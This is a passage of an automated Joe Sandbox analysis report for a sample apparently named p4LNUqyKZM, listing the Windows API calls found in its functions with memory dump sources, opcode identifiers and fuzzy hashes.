                        • Instruction Fuzzy Hash: CB12BD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                        APIs
                          • Part of subcall function 00984E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00984EDD,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E9C
                          • Part of subcall function 00984E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00984EAE
                          • Part of subcall function 00984E90: FreeLibrary.KERNEL32(00000000,?,?,00984EDD,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984EC0
                        • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984EFD
                          • Part of subcall function 00984E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,009C3CDE,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E62
                          • Part of subcall function 00984E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00984E74
                          • Part of subcall function 00984E59: FreeLibrary.KERNEL32(00000000,?,?,009C3CDE,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E87
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Library$Load$AddressFreeProc
                        • String ID:
                        • API String ID: 2632591731-0
                        • Opcode ID: e00c20c97850801150b596cff49085407fe03ddcab957aadcb60b430eefa8d00
                        • Instruction ID: fdd935ad77349451ec21906c04491c87c74ba3cc31654ddd6806da11f85ab32c
                        • Opcode Fuzzy Hash: e00c20c97850801150b596cff49085407fe03ddcab957aadcb60b430eefa8d00
                        • Instruction Fuzzy Hash: CF11E732650206AACF14FF60DC02FAD77A5AF80714F10842DF582A62C1EE749E459B50
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: __wsopen_s
                        • String ID:
                        • API String ID: 3347428461-0
                        • Opcode ID: 69dbeaed26da149f1845cfd379ea5715ed2376a06a3f96f0e537b1492878dac8
                        • Instruction ID: 8cb0ea9ef8a170c5551c631ad667aa191c4e1e4842039055595290f4e7242aec
                        • Opcode Fuzzy Hash: 69dbeaed26da149f1845cfd379ea5715ed2376a06a3f96f0e537b1492878dac8
                        • Instruction Fuzzy Hash: 7511187590420AAFCF05DF98EA41ADB7BF9EF48314F114059FC08AB312DA31DA11CBA5
                        APIs
                        • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,0098543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00989A9C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: db75374a4870402ac6c40c697c61ae3308ae19b01ff137cfe960edfb412bd18f
                        • Instruction ID: 03b760dbd9a8ca5ea7f850dae06df70960c807f7f3ecf4969182751bb9c60762
                        • Opcode Fuzzy Hash: db75374a4870402ac6c40c697c61ae3308ae19b01ff137cfe960edfb412bd18f
                        • Instruction Fuzzy Hash: 15113631204705AFDB25DE09C880B76B7E9AB44764F18C42EE99B8AB51C770E945CB60
                        APIs
                          • Part of subcall function 009B4C7D: RtlAllocateHeap.NTDLL(00000008,00981129,00000000,?,009B2E29,00000001,00000364,?,?,?,009AF2DE,009B3863,00A51444,?,0099FDF5,?), ref: 009B4CBE
                        • _free.LIBCMT ref: 009B506C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AllocateHeap_free
                        • String ID:
                        • API String ID: 614378929-0
                        • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                        • Instruction ID: a2a87843f5f14e4cf1fe50fe0d46bebc68806f06b30215e92c5899b76a7649ff
                        • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                        • Instruction Fuzzy Hash: 510126722047056BE3219F659881BDAFBEDFB89370F26091DE18893280EA30A805C6B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                        • Instruction ID: a3d938786b48cfaeaa409e091a625eef373685b00a642bf9704ccaeaf0d8a7fb
                        • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                        • Instruction Fuzzy Hash: F4F0F432511A14A6D6313A698D09B9B339C9FD3330F100F15F825921D2DB74E80186E9
                        APIs
                        • RtlAllocateHeap.NTDLL(00000008,00981129,00000000,?,009B2E29,00000001,00000364,?,?,?,009AF2DE,009B3863,00A51444,?,0099FDF5,?), ref: 009B4CBE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: f7be3ecd2128e477673d95c618e072c540dc19d6fbc48a86305b042af498fde8
                        • Instruction ID: b4060e2c1ba49087fc648489985eed1a55fb94d02fe61e9f1688ebce19f71bb7
                        • Opcode Fuzzy Hash: f7be3ecd2128e477673d95c618e072c540dc19d6fbc48a86305b042af498fde8
                        • Instruction Fuzzy Hash: 7DF0E03154222467DB215F619E05BD63F4CBF81F71F148121FC99D6183CA70DC0165D0
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,?,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6,?,00981129), ref: 009B3852
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 23cc9449971297e8d25b8cdd0b5f33dfcd344678a03fd4a08e3fd8bcc8a2f5a6
                        • Instruction ID: b957077506a8760dbd6bea0bdc8bdabe27d4ee5ca022974963f604cefe91c606
                        • Opcode Fuzzy Hash: 23cc9449971297e8d25b8cdd0b5f33dfcd344678a03fd4a08e3fd8bcc8a2f5a6
                        • Instruction Fuzzy Hash: A6E02231140224AAE731AABB9E00BDB375CBFC37B0F168134BC1596890DB60DE0282E3
                        APIs
                        • FreeLibrary.KERNEL32(?,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984F6D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FreeLibrary
                        • String ID:
                        • API String ID: 3664257935-0
                        • Opcode ID: 6d6e4d2fe1d7190a4e0a5dca732cb40a4f995c57c1188cc12b831a41c5fa592e
                        • Instruction ID: 996e711f67bbe7b69e4a09beafcfb05558bae50e45fd8819aee9d262b18d38d9
                        • Opcode Fuzzy Hash: 6d6e4d2fe1d7190a4e0a5dca732cb40a4f995c57c1188cc12b831a41c5fa592e
                        • Instruction Fuzzy Hash: CDF03971105752CFDB34AF64D490822BBE8BF143293258E7EE2EA82621C7359844DF50
                        APIs
                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00982DC4
                          • Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: LongNamePath_wcslen
                        • String ID:
                        • API String ID: 541455249-0
                        • Opcode ID: 1adaa06706fd866097f78b2e13228b3bbf3f71ca3f947496904887bdc26b6ff4
                        • Instruction ID: fa9223afe8a31a1a2caa3765c8e28cd49e60d49f705c0c7a5b09eb89c1fcbf82
                        • Opcode Fuzzy Hash: 1adaa06706fd866097f78b2e13228b3bbf3f71ca3f947496904887bdc26b6ff4
                        • Instruction Fuzzy Hash: 98E0CD76A042245BC710E2989C05FDA77DDDFC8790F044075FD09D7248DA70ED808651
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: __fread_nolock
                        • String ID:
                        • API String ID: 2638373210-0
                        • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                        • Instruction ID: b5a78397b752041097fd6734d4d3a7eaee7711e5724fe50676232ece44177891
                        • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                        • Instruction Fuzzy Hash: 4DE04FB0609B005FDF399B28A8517B677E89F4A300F00086EF69BC2252E57268458B4D
                        APIs
                          • Part of subcall function 00983837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00983908
                          • Part of subcall function 0098D730: GetInputState.USER32 ref: 0098D807
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00982B6B
                          • Part of subcall function 009830F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0098314E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: IconNotifyShell_$CurrentDirectoryInputState
                        • String ID:
                        • API String ID: 3667716007-0
                        • Opcode ID: 53c58d0a01e123f1f0d23e5fcae4a102d54f0366b5ae6f0d077f3d855514e695
                        • Instruction ID: 40d59838b33a74add9b3bc1da2055efa313ee741ed1c1ce284aa3a87854bec91
                        • Opcode Fuzzy Hash: 53c58d0a01e123f1f0d23e5fcae4a102d54f0366b5ae6f0d077f3d855514e695
                        • Instruction Fuzzy Hash: 2CE0866230524406CA04BB74A8527BDE7599BD1756F40553EF546873E2CE24494A4352
                        APIs
                        • CreateFileW.KERNELBASE(00000000,00000000,?,009C0704,?,?,00000000,?,009C0704,00000000,0000000C), ref: 009C03B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 27524e543146922a14432c5bfa0f4f0c61e9ec28acc41a0add54b95ea6af45cd
                        • Instruction ID: cda965eeefde909c94b4dd55601576e35279055284fed9f5403a1474e3f162f9
                        • Opcode Fuzzy Hash: 27524e543146922a14432c5bfa0f4f0c61e9ec28acc41a0add54b95ea6af45cd
                        • Instruction Fuzzy Hash: FDD06C3208010DBBDF028F84DD06EDA3BAAFB48714F018100BE1856020C732E822AB90
                        APIs
                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00981CBC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: InfoParametersSystem
                        • String ID:
                        • API String ID: 3098949447-0
                        • Opcode ID: 6c860f5ee40e79493834638a1445b7256aaac9ed327fc65e18429d248888384e
                        • Instruction ID: 2dd8e3da9b11631336c53d6b5c80cbc0e0034563d04f3006a7d51f8f6756dcb1
                        • Opcode Fuzzy Hash: 6c860f5ee40e79493834638a1445b7256aaac9ed327fc65e18429d248888384e
                        • Instruction Fuzzy Hash: FCC092362C0304AFF215CBC0BC5EF607765B358B26F048401F609AD5F3D3A22822EB50
                        APIs
                        • GetTempPathW.KERNELBASE(00000104,?), ref: 009DD8E9
                          • Part of subcall function 009833A7: _wcslen.LIBCMT ref: 009833AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: PathTemp_wcslen
                        • String ID:
                        • API String ID: 1974555822-0
                        • Opcode ID: 211ec1020842d9203ee5d2abfc5b7efe7120b7ef5ff991cf78c1c3742721ac5c
                        • Instruction ID: b831686f9ab8df88fc2698efbf4fec7d328c20ae4da134bd8d26ed97a67978d9
                        • Opcode Fuzzy Hash: 211ec1020842d9203ee5d2abfc5b7efe7120b7ef5ff991cf78c1c3742721ac5c
                        • Instruction Fuzzy Hash: BFC0487459201A9BDB90BBA0CCC9EE8B338EF00701F50C096E20A91190DE709A898B12
                        APIs
                          • Part of subcall function 00985745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0098949C,?,00008000), ref: 00985773
                        • GetLastError.KERNEL32(00000002,00000000), ref: 009F76DE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateErrorFileLast
                        • String ID:
                        • API String ID: 1214770103-0
                        • Opcode ID: 4b420941f8958471841c542ebdb919d5ec68b70840ddc9f36fb9b3cbd73cbdf3
                        • Instruction ID: 8fdb7582bcc50edde3210a3daed5413c05aed1a0e3062ed369bf527c1747dd57
                        • Opcode Fuzzy Hash: 4b420941f8958471841c542ebdb919d5ec68b70840ddc9f36fb9b3cbd73cbdf3
                        • Instruction Fuzzy Hash: 3B81AD302087059FCB14EF68C491B6AB7E5BF89314F04496DF9969B3A2DB30ED45CB92
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction ID: 8fcbf75a5daa0bd54b63c003cdeebb9b199f72c7c78ffa9bdb09b202bd730f2f
                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction Fuzzy Hash: 3431D375A00109DBCB18CF5DD4A0969FBA9FF49300B28C6A5E849CB696E731EDC1CBD0
                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 009622B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                        • Instruction ID: 49af86090f8c3aced6971d5606fda41fa40fa59368279b906dd098a558f66263
                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                        • Instruction Fuzzy Hash: 4FE0BF7494010EEFDB00EFA4D5496DE7BB4EF04711F1005A1FD05D7680DB309E548A62
                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 009622B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction ID: 60629779f3f8b857381546d31f5ec8c5cf71497cb24ddd7a2e4f0781e3518bb6
                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction Fuzzy Hash: CFE0E67494010EDFDB00EFB4D54969E7FB4EF04701F100161FD01D2280D6309D508A72
                        APIs
                          • Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2
                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A1961A
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A1965B
                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00A1969F
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A196C9
                        • SendMessageW.USER32 ref: 00A196F2
                        • GetKeyState.USER32(00000011), ref: 00A1978B
                        • GetKeyState.USER32(00000009), ref: 00A19798
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A197AE
                        • GetKeyState.USER32(00000010), ref: 00A197B8
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A197E9
                        • SendMessageW.USER32 ref: 00A19810
                        • SendMessageW.USER32(?,00001030,?,00A17E95), ref: 00A19918
                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A1992E
                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A19941
                        • SetCapture.USER32(?), ref: 00A1994A
                        • ClientToScreen.USER32(?,?), ref: 00A199AF
                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A199BC
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A199D6
                        • ReleaseCapture.USER32 ref: 00A199E1
                        • GetCursorPos.USER32(?), ref: 00A19A19
                        • ScreenToClient.USER32(?,?), ref: 00A19A26
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A19A80
                        • SendMessageW.USER32 ref: 00A19AAE
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A19AEB
                        • SendMessageW.USER32 ref: 00A19B1A
                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A19B3B
                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A19B4A
                        • GetCursorPos.USER32(?), ref: 00A19B68
                        • ScreenToClient.USER32(?,?), ref: 00A19B75
                        • GetParent.USER32(?), ref: 00A19B93
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A19BFA
                        • SendMessageW.USER32 ref: 00A19C2B
                        • ClientToScreen.USER32(?,?), ref: 00A19C84
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A19CB4
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A19CDE
                        • SendMessageW.USER32 ref: 00A19D01
                        • ClientToScreen.USER32(?,?), ref: 00A19D4E
                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A19D82
                          • Part of subcall function 00999944: GetWindowLongW.USER32(?,000000EB), ref: 00999952
                        • GetWindowLongW.USER32(?,000000F0), ref: 00A19E05
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
